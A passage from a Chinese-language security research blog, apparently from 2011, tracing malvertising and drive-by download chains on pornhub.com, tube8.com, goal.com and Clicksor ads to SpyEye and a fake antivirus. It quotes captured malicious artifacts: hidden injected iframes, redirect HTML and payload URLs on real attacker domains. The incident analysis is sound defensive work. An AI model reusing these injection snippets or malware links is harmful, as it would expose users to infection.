<br />
我們立刻通知CamCERT,在幾個小時過後我們收到了一封E-mail:他們已經在處理這個事件了。<br />
<br />
<a href="https://www.globalsign.com/blog/2011/07/malware-monitoring-and-detection-%E2%80%93-the-latest-hack-is-the-cambodia-government-cert/">GlobalSign針對此次事件的報導</a><br />
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-8238727458478713262011-05-31T14:20:00.000+08:002011-05-31T14:20:23.777+08:00成人網站擁有大量流量... 及惡意廣告(作者:Chris Hsiao, NightCola Lin, Wayne Huang)<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5A-Q1Qj5G18VkgMq2wGyKstNg6OUaXbmTpIFKaBWBwJ7xXHIRyUfDvfhpAf5M2Emfg9Kj8QcXFVNqZXwyo4ZnIePyCiBVzXn2kgC7neSqq0p2F462jYKoogyXm9yizoQ1d0LkrNQXyTY/s1600/pron_hub_web_malware_drive_by_download.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5A-Q1Qj5G18VkgMq2wGyKstNg6OUaXbmTpIFKaBWBwJ7xXHIRyUfDvfhpAf5M2Emfg9Kj8QcXFVNqZXwyo4ZnIePyCiBVzXn2kgC7neSqq0p2F462jYKoogyXm9yizoQ1d0LkrNQXyTY/s1600/pron_hub_web_malware_drive_by_download.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610061629900919330" /></a><br />
如果你在下班時間走進我們的辦公室,發現我們很多人都圍繞在Chris.Hsiao的位置附近,而銀幕上顯示的是大量的成人網站及圖片......相信我們正在工作。<br />
<br />
在阿碼科技,我們積極的掃描大量的網站以確認其是否有惡意行為,當然我們沒有辦法涵蓋所有的網站,因此我們試著至少能涵蓋那些比較大的網站。當我們建立好這一個平臺之後,我們隨即發現到一個狀況:在其中有好一大部份的比率竟然是那些成人網站(具有相當大的流量)!<br />
<br />
隨著我們開始掃描這些網站,即刻發現到了一個現象:除了大量流量以外,這些網站通常也辦隨著惡意廣告(malvertising)。<br />
<br />
惡意廣告透過網站(在廣告產業中,我們稱之為publisher)提供給瀏覽者。一些惡意廣告會隨著drive-by download 的行為一起出現,在瀏覽者看到的同時,不需要做任何動作、也不需要去按任何確認鍵,就有被感染的風險。<br />
<br />
以下是我們這次的報導:一個惡意廣告商(celeb-escorts.com)是如何讓兩個非常大的成人網站去顯示他所提供的惡意廣告。<br />
<br />
第一個網站是:pornhub.com,<a href="http://www.alexa.com/search?q=pornhub.com&r=home_home&p=bigtop">Alexa排名第62名</a>,每一天有<b><a href="http://siteanalytics.compete.com/pornhub.com/">23,873,546</a></b>個瀏覽者。<br />
<br />
相當大的流量!惡意廣告透過廣告仲介(網站與廣告商間的中介,一般稱之為AD network / exchange):etology.com 顯示在pornhub.com上。這幅惡意廣告是由celeb-escorts.com這個廣告商(Advertiser)提供給etology的,而celeb-escorts.com這個網域在今年(2011)五月11日才註冊。因此,種種跡象顯示celeb-escorts.com非常可能是由惡意團體所註冊的,用途是將其惡意廣告散播到整個廣告網路中。下圖是本次事件中相關的網站:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhH0olu3rZkVwx4paQxVP7lMNxIR_9dWy48UAetK_rJHDw5eqPNN5Xmvwah1Kwm6R-Ka8lmzCAjdxapAFUJAOrCZTySaEPoF7kx1BKXeq_UdCDw0WYoynDl4UgqKW_Wp16AdOQRfAsQE0/s1600/pornhub_malvertising_drive_by_download.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhH0olu3rZkVwx4paQxVP7lMNxIR_9dWy48UAetK_rJHDw5eqPNN5Xmvwah1Kwm6R-Ka8lmzCAjdxapAFUJAOrCZTySaEPoF7kx1BKXeq_UdCDw0WYoynDl4UgqKW_Wp16AdOQRfAsQE0/s1600/pornhub_malvertising_drive_by_download.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610519645398846626" /></a><br />
下圖則是事件的主角:惡意廣告本身,透過celeb-escorts所顯示的。在顯示這幅廣告的同時,也會同時產生iframe將瀏覽者導向tun4atta.in,整個惡意行為的起始點。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9QVCN1FSJnlZS74B1caYuzdcW1fwPRwarFXm6-tgsDvec1dNeiZcpnZVKfqxs3vZzTBV4CG9ozs3biHR-CiwdlyXhZOQZHdRuU5t3v100mM2PVlODpnevdH9LWjR9IKOxT-kE54fNwD8/s1600/malvertisement_celeb_escorts.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9QVCN1FSJnlZS74B1caYuzdcW1fwPRwarFXm6-tgsDvec1dNeiZcpnZVKfqxs3vZzTBV4CG9ozs3biHR-CiwdlyXhZOQZHdRuU5t3v100mM2PVlODpnevdH9LWjR9IKOxT-kE54fNwD8/s1600/malvertisement_celeb_escorts.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610604958180982482" /></a><span class="fullpost"><br />
整個感染鏈及細節如下:<br />
<br />
1. http://www.pornhub.com/<br />
<br />
2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage<br />
<br />
3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/<br />
<br />
4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29<br />
<br />
5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html<br />
<br />
6. http://pages.etology.com/imp2/93114.php<br />
<pre class="brush: html; auto-links: false"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>
</pre><br />
7. http://celeb-escorts.com/banners/300x250.jpg<br />
<pre class="brush: html; auto-links: false"><a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg' border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>
</pre><br />
8. http://tun4atta.in/bcounter.php?u=adult<br />
<pre class="brush: html; auto-links: false"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>
</pre><br />
9. http://iban6duo.in/ts/in.cgi?adult<br />
<pre class="brush: html; auto-links: false"><html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>
</pre><br />
10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb<br />
(此即為最後下載並執行的惡意軟體)<br />
<br />
這次攻擊者所使用的exploit pack是Black Hole。從我們一開始在五月13日發現後,最後下載並安裝的惡意軟體一直隨著時間在改變。<br />
<br />
一開始發現的惡意軟體是 <a href="http://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot">SpyEye</a>,他是一個類似 Zeus 的犯罪軟體(crimeware)。一開始VirusTotal上的偵測率僅有 <a href="http://www.virustotal.com/file-scan/report.html?id=3b5dc4738a1afeaab369c706c34d54aeaf23bf39a50a8b456b92ab0ad3feb2b4-1305532242">3/42</a>,至於目前已經有 <a href="http://www.virustotal.com/file-scan/report.html?id=3b5dc4738a1afeaab369c706c34d54aeaf23bf39a50a8b456b92ab0ad3feb2b4-1305532242">21/42</a>。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDKMjH9BGvaqsYlfq3OiXMfL87IkG-L5-idx2OsoCJhyphenhyphen35IFGEAhI7Iej9UEKzpJTueZpZrG9SvCdkRvsMoIFOIuz6HHKwB8fYrJGP-yHC6p2g-2wNVeRIOZTHvfdiLUyMNP5aYPYqvdQ/s1600/pornhub_malvertising_drive_by_download_virus_total.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDKMjH9BGvaqsYlfq3OiXMfL87IkG-L5-idx2OsoCJhyphenhyphen35IFGEAhI7Iej9UEKzpJTueZpZrG9SvCdkRvsMoIFOIuz6HHKwB8fYrJGP-yHC6p2g-2wNVeRIOZTHvfdiLUyMNP5aYPYqvdQ/s1600/pornhub_malvertising_drive_by_download_virus_total.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610519650046138770" /></a><br />
目前自動下載並安裝的惡意軟體仍然是 SpyEye,但是有被重新加殼過,因此在VirusTotal上的偵測率僅有 <a href="http://www.virustotal.com/file-scan/report.html?id=23d29b22d01edc3bc6c7d388ed82c9581afbd8a80c674026e40004197ae514e4-1306299679">5/42</a>。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9MylU7cakkDe82DEA5HnjuLxKTYGgrZBsApQKCxHGGrrB88pPSXqhrU8nqpD5Pz1eL7FIX28VAMJCGvQSAefsZ9E4FE0X5Y7SeBzMOFcboDcR-SoNy56tqzvUTUmsao7UjePiI-to-co/s1600/pornhub_malvertising_drive_by_download_virus_total2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9MylU7cakkDe82DEA5HnjuLxKTYGgrZBsApQKCxHGGrrB88pPSXqhrU8nqpD5Pz1eL7FIX28VAMJCGvQSAefsZ9E4FE0X5Y7SeBzMOFcboDcR-SoNy56tqzvUTUmsao7UjePiI-to-co/s1600/pornhub_malvertising_drive_by_download_virus_total2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610519655156275810" /></a><br />
第二個網站是:tube8.com,<a href="http://www.alexa.com/search?q=tube8.com&r=site_screener&p=bigtop">Alexa排名第113名</a>,每一天有<b><a href="http://siteanalytics.compete.com/tube8.com/">10,885,350</a></b>個瀏覽者。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsydx5q5Tb6htgciH7Q9fNS_x9kxPVaMok4z3Eqp-6azwzhY5Mw9rFcjJB1ftn0Ar7HmIKTdcY5Gbi9p7GFqaLIkqyaz3Zd7TQRCia-0V_l_7KBB78ZsS4n-0xNdCEuYuvL_d1ar4dmc/s1600/tube.com.1.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsydx5q5Tb6htgciH7Q9fNS_x9kxPVaMok4z3Eqp-6azwzhY5Mw9rFcjJB1ftn0Ar7HmIKTdcY5Gbi9p7GFqaLIkqyaz3Zd7TQRCia-0V_l_7KBB78ZsS4n-0xNdCEuYuvL_d1ar4dmc/s1600/tube.com.1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610604961502232658" /></a><br />
一開始載入的廣告代理商(Traffic Junky (trafficjunky.net))、廣告仲介商(etology.com)都是一樣的。我們實際上也在tube8.com上看到了相同的一幅惡意廣告。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggyhYMYS3K8dNtC7fl7qRaVNXNNGPq0gYymIbktXYtfohokbxBnQnd9_qCUDsvX9NHyYwvXJram1mubt-6bwaaH_sL6K1MyU7mdV993DqjVnnX-1G_Htu8c18VAqzRXHZOY2-huqIKtT0/s1600/tube8.com.2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggyhYMYS3K8dNtC7fl7qRaVNXNNGPq0gYymIbktXYtfohokbxBnQnd9_qCUDsvX9NHyYwvXJram1mubt-6bwaaH_sL6K1MyU7mdV993DqjVnnX-1G_Htu8c18VAqzRXHZOY2-huqIKtT0/s1600/tube8.com.2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610604966707798274" /></a><br />
下圖則是本次事件中相關的網站:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9_KVBqnpmE7QAcQ_jxsyrVoy9Jd9C34VifFTwE5jGnAqiXIXqIrXZ3Zg-mDgtzj2K4ULv_hiPIi6F1IhPL5iHItfvCmDBQHfh6M7uSE7wxpwYuFzT_2OyyhKs0dp96w42AjyE3H17kw/s1600/pornhub_malvertising_drive_by_download_tube8.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand; width:750px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9_KVBqnpmE7QAcQ_jxsyrVoy9Jd9C34VifFTwE5jGnAqiXIXqIrXZ3Zg-mDgtzj2K4ULv_hiPIi6F1IhPL5iHItfvCmDBQHfh6M7uSE7wxpwYuFzT_2OyyhKs0dp96w42AjyE3H17kw/s1600/pornhub_malvertising_drive_by_download_tube8.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610601854562594978" /></a><br />
整個感染鏈及細節如下:<br />
<br />
1. http://tube8.com<br />
<br />
2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage<br />
<br />
3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html<br />
<pre class="brush: html; auto-links: false"><iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
</pre><br />
<br />
4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300<br />
<br />
5. http://pages.etology.com/imp2/96244.php<br />
<br />
6. http://celeb-escorts.com/banners/300x250.jpg<br />
<br />
7. http://tun4atta.in/bcounter.php?u=adult<br />
<pre class="brush: html; auto-links: false"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>
</pre><br />
8. http://iban6duo.in/ts/in.cgi?adult<br />
<pre class="brush: html; auto-links: false"><html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>
</pre><br />
9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb<br />
(此即為最後下載並執行的惡意軟體)<br />
<br />
根據這兩個網站龐大的流量(分別為<a href="http://siteanalytics.compete.com/pornhub.com/">23,873,546</a> 和 <a href="http://siteanalytics.compete.com/tube8.com/">10,885,350</a>),而且從五月13日開我們就一直發現這個惡意廣告的存在,相信截至目前為止,已經有相當大的劉覽者被感染了。</span>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1441759431140700676.post-48446937282283603942011-05-20T20:17:00.000+08:002011-05-20T20:17:41.425+08:00goal.com再度散播惡意程式:偽防毒軟體"Security Shield"(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDuF5td19UlRBbuk8G17mvhLV568kviSbhZ2SnYMmYK0UqMHEK9bjXL0zdDdPFMDDIu6suo5Qwc_b5JNpBbv3adyyCxIcWdTeAqWHlJXROCubVH4mFpzN-xMCHmLZelq80AZ4yhZRy7C4/s1600/goal_com_web_malware_fake_av_security_shield.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDuF5td19UlRBbuk8G17mvhLV568kviSbhZ2SnYMmYK0UqMHEK9bjXL0zdDdPFMDDIu6suo5Qwc_b5JNpBbv3adyyCxIcWdTeAqWHlJXROCubVH4mFpzN-xMCHmLZelq80AZ4yhZRy7C4/s1600/goal_com_web_malware_fake_av_security_shield.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607880338090708466" /></a><br />
在我們<a href="http://blog.armorize.com/2011/05/goalcom-serving-malware.html">上一篇分析goal.com</a>的報導中,有提到一段:"根據我們所搜集到的資料,有部份的goal.com似乎已經被感染且允許攻擊者操控其網頁內容。受感染網站可能存在供攻擊者持續使用的後門程式,用以控制該網站。"<br />
<br />
上次事件中所使用的惡意程式碼在不久之後即從goal.com中消失,然而,<a href="http://hackalert.armorize.com/">HackAlert</a>在最近(2011/5/17)又偵測到該網站有在散播惡意軟體的行為,表示攻擊者在該網站應該已經植入了後門。在這一次,他們透過goal.com來散播偽防毒軟體"Security Shield"。<br />
<br />
<b>[摘要]</b><br />
<br />
觸發行為:<br />
在使用者瀏覽Goal.com後,瀏覽器執行了該網站中被插入的惡意程式碼(指向31d6f5art8.co.be)後,不需要透過任何誘騙的手段、也不需要使用者點選特定連結,便會開始產生偷渡式下載(Drive-by Download)的行為將偽防毒軟體"Security Shield"安裝到使用者的電腦上。使用者僅是簡單的瀏覽一個網站,就受到惡意程式的感染。"Security Shield"會持續的發出警告,同時開啟瀏覽器連到一些成人網站,只有在當使用者購買了"序號"之後,才會停止這些擾人的行為。就算將電腦重開機,也沒有辦法停止這些擾人的行為,因為該偽防毒軟體已經安裝到使用者的電腦裡面並且常駐著。<br />
<br />
惡意網域 a78hl7zv4p.co.be 針對每一個IP僅會提供一次攻擊碼。<br />
<br />
在這篇文章剛發出之後,攻擊者又非常快速的將上面提到的兩個惡意網域關閉,立刻使用了一組新的惡意網域:zfdim0u06t.co.be 以及 4t7uxaxrg8.co.be。而當我們在修改我們部落格上的文章時,他們又換了一組惡意網域:uzldzzzeo3.co.be 及 zepa6hr6jk.co.be。<br />
<br />
偵測率:<br />
惡意網域包含 31d6f5art8.co.be、a78hl7zv4p.co.be、zfdim0u06t.co.be 及 4t7uxaxrg8.co.be。沒有任何一個被urlvoid.com上面的18家黑名單提供者標示為黑名單。<br />
至於goal.com本身,在<a href="http://www.urlvoid.com/scan/goal.com">urlvoid.com</a>上同樣也沒有被任何一家標示(0/18)。<br />
<br />
惡意程式"Security Shield"本身在<a href="http://www.virustotal.com/file-scan/report.html?id=089329aa3c9a379d90629f9edb796c6aad161a908cf377b79b0e72f02a0e62be-1305629011">VirusTotal</a>上面的偵測率是6/42。<br />
<br />
使用技術:<br />
偷渡式下載(Drive-by Download),攻擊者控制了goal.com的內容。(本案例非透過惡意廣告散播)<br />
<br />
以下是我們針對這一事件所錄製的影片,從一開始瀏覽goal.com,到整個"Security Shield"執行起來。<br />
<object width="750"><param name="movie" value="http://www.youtube.com/v/Jw9ekH0XvvE?hl=zh&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/Jw9ekH0XvvE?hl=zh&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br />
<b>[感染點]</b><br />
被感染的網址是[http://www.goal.com/en],以下為感染進去的程式碼片段:<br />
<pre class="brush: html;"><div id="eplayer">
<style type="text/css">#adtfd {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style>
<iframe id="adtfd" src="http://31d6f5art8.co.be/ad.jpg"></iframe>
</div>
</pre><br />
此段程式碼會產生iframe指向 http://a78hl7zv4p.co.be/domains/buy,這就是產生攻擊碼(exploit code)的網址。<br />
攻擊碼一旦成功執行,瀏覽器會產生偷渡式下載的行為:從 http://a78hl7zv4p.co.be/domains/bf02bde9910ff9be016eb48ac5a51043.php?thread_id=2&f=63444537&topic_id=buy& 下載"Security Shield"。<br />
<br />
"Security Shield"會自行進行安裝,隨即開始顯示假的警告以及自動開始瀏覽器連向成人網站:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0G2wdlwBGXWcZUs1K0QpIT3wUOGVdoebgrnGLWFzO7z7A_ZfPZeF3GHaBD3o7-_a60R7lBAt1jUXsb4T1HLXxK1ZSXGXNfYKoXqHS5Zeim9ho2k_CRVaX8imixXIrFtELoOfAxiBbCq4/s1600/goal_com_web_malware_fake_av_security_shield_installed.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0G2wdlwBGXWcZUs1K0QpIT3wUOGVdoebgrnGLWFzO7z7A_ZfPZeF3GHaBD3o7-_a60R7lBAt1jUXsb4T1HLXxK1ZSXGXNfYKoXqHS5Zeim9ho2k_CRVaX8imixXIrFtELoOfAxiBbCq4/s1600/goal_com_web_malware_fake_av_security_shield_installed.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607920576464319346" /></a><span class="fullpost"><br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkirQjeCaWJDcoSJC_9Bx-jNp2JwrLm_Dq6h786fIvLQT4uxAgxKff60ewvzdJBTdof-AhvqY-dUj3MQ0hFySVTxaxBpcOJ2TLTeY947IW6MyWurFAdoYFNTUA4eL_U98dLEoVBwtVm8/s1600/security_shield_infection.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width:750px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkirQjeCaWJDcoSJC_9Bx-jNp2JwrLm_Dq6h786fIvLQT4uxAgxKff60ewvzdJBTdof-AhvqY-dUj3MQ0hFySVTxaxBpcOJ2TLTeY947IW6MyWurFAdoYFNTUA4eL_U98dLEoVBwtVm8/s1600/security_shield_infection.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607954836488225554" /></a><br />
<b>[偵測率]</b><br />
惡意程式"Security Shield"本身在<a href="http://www.virustotal.com/file-scan/report.html?id=089329aa3c9a379d90629f9edb796c6aad161a908cf377b79b0e72f02a0e62be-1305629011">VirusTotal</a>上面的偵測率是6/42。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3l8kUYnXOIbulyC4p0amBAhOaIzvF7H2hRHt1BxJkbIWMmNQLT3I0Gd2A3OiHDo5LtF7rGcPYsW_9ulCn1BLU00DWC6jqIxPJWLdFaxdwkak_R_Ktx1H0QFTWetHV_YuhKrR449lsj-k/s1600/Goal_Com_drive_by_download_detection_rate.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3l8kUYnXOIbulyC4p0amBAhOaIzvF7H2hRHt1BxJkbIWMmNQLT3I0Gd2A3OiHDo5LtF7rGcPYsW_9ulCn1BLU00DWC6jqIxPJWLdFaxdwkak_R_Ktx1H0QFTWetHV_YuhKrR449lsj-k/s1600/Goal_Com_drive_by_download_detection_rate.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607949196001365362" /></a><br />
goal.com本身,在<a href="http://www.urlvoid.com/scan/goal.com">urlvoid.com</a>上被標示為黑名單的比率是0/18。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDM3yQVpHsAmepTBeDT-t37OBVBLpw2mdmJn8S3o0RxCJ5AUq9ASZ5QxT6SjH7ZpYEH-UP_ON3HgpaNXW4u7d552C2O_NehGerj1Hz7Yt4_yjdGJdf1F-QznVdf_NmljZv0svTGh4ivdc/s1600/url_void_goal_com_web_malware_drive_by_download.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDM3yQVpHsAmepTBeDT-t37OBVBLpw2mdmJn8S3o0RxCJ5AUq9ASZ5QxT6SjH7ZpYEH-UP_ON3HgpaNXW4u7d552C2O_NehGerj1Hz7Yt4_yjdGJdf1F-QznVdf_NmljZv0svTGh4ivdc/s1600/url_void_goal_com_web_malware_drive_by_download.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607952532964204802" /></a><br />
<br />
<b>[網站流量及排名]</b><br />
1. 根據<a href="http://siteanalytics.compete.com/goal.com/">compete.com</a>,goal.com每一天平均有232,116個人瀏覽。<br />
2. 根據<a href="http://www.checksitetraffic.com/traffic_spy/goal.com">checksitetraffic.com</a>,每一天則有215,989人。<br />
3. goal.com在Alexa<a href="http://www.alexa.com/siteinfo/goal.com">alexa.com</a>全球的排名是Rank. 379。<br />
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-79273666714427804522011-05-16T13:24:00.005+08:002011-06-17T17:20:32.207+08:00超過一半以上的惡意廣告來自Clicksor(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)<br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSDBosqPnWL5AiwnsjZObzlYPwAIQIfPwrkSpw5N3FLvNylGBPe3cH4qGse__FykMBvZrp7GqE0jEScgBCm_PEIcy8P6hoR-IukM5Ay_V1PlpGpKBg_0rrkBdcurzCDt8oM3PkC68o7ayQ/s1600/clicksor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="486" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSDBosqPnWL5AiwnsjZObzlYPwAIQIfPwrkSpw5N3FLvNylGBPe3cH4qGse__FykMBvZrp7GqE0jEScgBCm_PEIcy8P6hoR-IukM5Ay_V1PlpGpKBg_0rrkBdcurzCDt8oM3PkC68o7ayQ/s640/clicksor.png" width="640" /></a></div><br />
最近,我們的Hackalert偵測到大量的惡意廣告(Malvertising),其中有一半以上是來自廣告商-<b>Clicksor</b>。<br />
<br />
<b>分析:</b><br />
這邊我們只挑了其中一個來做分析說明。<a href=http://www.openwaves.net/Clicksor_infection/mytingoo.com.zip><b>這邊有完整的記錄檔可供下載</b></a>,其感染路徑如下:<br />
<br />
1. 受害網站: <br />
<pre class="brush: html;">http://mytingoo.com/</pre>2. 包含的Clicksor廣告連結: <br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script></pre>3. 載入廣告的內容片斷:<br />
<pre class="brush: html;"><script type="text/javascript" src="http://pub.clicksor.net/newServing/js/banner.js"></script></head><body><div id="tip"><span>Tooltips</span></div><div id="ad_block"><ul><li><ol><li class="rich" style="width:728px;height:90px;" id="ad0" ><iframe src=http://anexsecurity.com/pub_ben/728x90.jpg width='728' height='90' frameborder='0' scrolling='no' marginheight=0 marginwidth=0></iframe><img border="0" width="1" height="1" alt="roi px" src="http://serw.clicksor.com/newServing/roitrack.php?cluid=1092-1-186469-30-94296-57-1304418113354-1304418118-1034384353-281945&nid=1&type=Other&value=-1&adsid=51" /></li></ol></li></ul></div><!-- generated in 0.017482995986938s. --></body></html></pre>4. 